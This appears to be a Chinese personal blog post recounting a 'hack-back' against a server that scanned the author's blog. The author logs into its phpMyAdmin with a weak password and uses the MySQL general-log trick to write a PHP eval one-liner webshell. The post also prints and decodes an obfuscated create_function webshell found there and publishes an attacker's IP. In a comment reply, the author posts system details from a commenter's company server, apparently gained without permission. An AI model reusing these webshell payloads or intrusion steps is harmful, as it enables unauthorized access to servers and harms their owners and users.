记一次反渗透的经历


事情发生在10月9号 发生的很巧,他扫我博客的时候,我正好在测某站的SSRF又正好在请求自己的博客域名,在服务器上看着Web记录。

就看到了这个小伙伴在肆无忌惮的扫我的博客,虽然只是你的扫描器爬到我的站,可万一真被你日下了,那可就尴尬了..

随手百度了一下这个IP想看看是什么地方的,结果显示是新加坡的。感觉是个肉鸡,有搞头。果断nmap跑一波。

访问了一下80  发现hello world 直觉告诉我,他是从web渗透进去的。丢御剑扫了一下文件得到一下结果

访问xiao.php发现文件很大而且从内容可以看出,这是一个phpmyadmin的全局日志文件,突然虎躯一震,难道这个大黑阔就是通过修改全局日志文件路径到WEB目录下然后查询一句话,把一句话写入到文件中从而得到webshell的?

扫到了phpmyadmin 不出意外弱口令成功进入 刚刚上面拿到了网站的绝对路径,想直接写webshell发现失败了

写不出去就算了,赶紧去看看全局变量,证实一下我的猜想。

果然如此。那我也用这种方法拿个webshell

首先修改地址为一个新的文件,他那个文件太大了,写入不好连接,太卡(可以写入生成马,我就是懒。)

这里改成x1a0.php  吧i换成了数字1  免得被他发现了

然后执行查询一句话,把记录写入到日志文件里面

select '<?php eval($_POST[x]);?>';

访问我们的刚刚修改的文件名  成功获得Webshell

 

然后赶紧回去phpmyadmin把日志路径改回去。免得文件过大。

连上去的一瞬间我就感觉肯定是administrator权限,但是看到了cmd.exe这个文件的时候我是一脸懵逼的

不过这趟操作捕获到了一个有意思的脚本。创建时间2015-07-16????

此代码仅可做于安全研究请勿用于非法攻击。

<?php /*1*/$CF/*2*/='c'./*3*/"".'r'./*exit;*/"".'e'./*5*/"".'a'./*6*/"".'t'./*7*/"".'e'./*8*/"".'_'./*9*/"".'f'./*0*/"".'u'./*echo*/"".'n'./*9*/"".'c'./*8*/"".'t'./*7*/"".'i'./*6*/"".'o'./*5*/"".'n';$EB/*die();*/=@$CF/*3*/('','e'.""./*2*/'v'.""./*1*/'a'.""./*0*/'l'.""./*1*/'(b'.""./*2*/'a'.""./*3*/'s'.""./*sleep(1);*/'e'.""./*5*/'6'.""./*6*/'4'.""./*7*/'_'.""./*8*/'d'.""./*9*/'e'.""./*0*/'c'.""./*1*/'o'.""./*2*/'d'.""./*3*/'e'.""./*echo*/'("QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicmJiRfU0VTU0lPTlsndGhlQ29kZSddPSRfUE9TVFsnY29kZSddO2lmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSlAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7"));');$EB/*exit;*/();/*die("FWA");*/ ?>

解密后

<?php 
$CF ='create_function';
$EB=@$CF(eval(base64_decode("@session_start();if(isset($_POST['code']))substr(sha1(md5($_POST['a'])),36)=='222f'&&$_SESSION['theCode']=$_POST['code'];if(isset($_SESSION['theCode']))@eval(base64_decode($_SESSION['theCode']));"));');$EB(); ?>

cmd.exe 不用管他,可能是个正常的cmd也可能是黑阔的远控,虽然想下载下来扔到虚拟机抓个请求,看看他的上线地址。可这几天好迷茫。没时间。

现在webshell的权限是administrator权限可以干很多事情,我下载了网站的日志文件,我像看看这个黑阔的请求IP,继续撸

在日志中看到有三十多个IP扫过这台服务器扫描字典一模一样。  感觉是扫描器,这些IP是肉鸡节点

最早出现的马 sean.php出现在三号,第一个访问IP地址是 59.36.119.227 深圳的小伙伴

我看到最近他还在连接这个shell  我本来打算在服务器上放点东西,并在他的webshell里面加点料的继续撸的…

可这几天都没时间,就不打算继续了。

这几天一直在找区块链安全这方面的资料,在恶补这块。好痛苦,希望有好资料的小伙伴能共享我一份。

对这方面太陌生了,希望找个能一起入坑的小伙伴一起学习区块链安全。

3 人评论 “记一次反渗透的经历”

    1. 兄弟,首先,先谢谢你逛我的博客,并且认真看了我写的垃圾东西。
      我准备回复你的时候,随手点开了你留的网站,这网站可能是你上班的公司,也或者是你自己的公司。既然你也关注网安这块,我想安全应该做的不错吧…
      可是… 我错了,你们网站的安全性,真的好差啊!.. 简直就是无安全可言,漏洞一堆,看你们用户也不少,漏洞影响还蛮大的。如果你回来看到了我的回复,请联系我一下
      我愿意告诉你们漏洞存在什么地方,也愿意协助你们修复漏洞。 (*^▽^*)

      http://www.chedianzhang.com/robots.txt
      系统: Linux iZ25n1d43o7Z 3.10.0-693.11.1.el7.x86_64 #1 SMP Mon Dec 4 23:52:40 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

发表评论

电子邮件地址不会被公开。 必填项已用*标注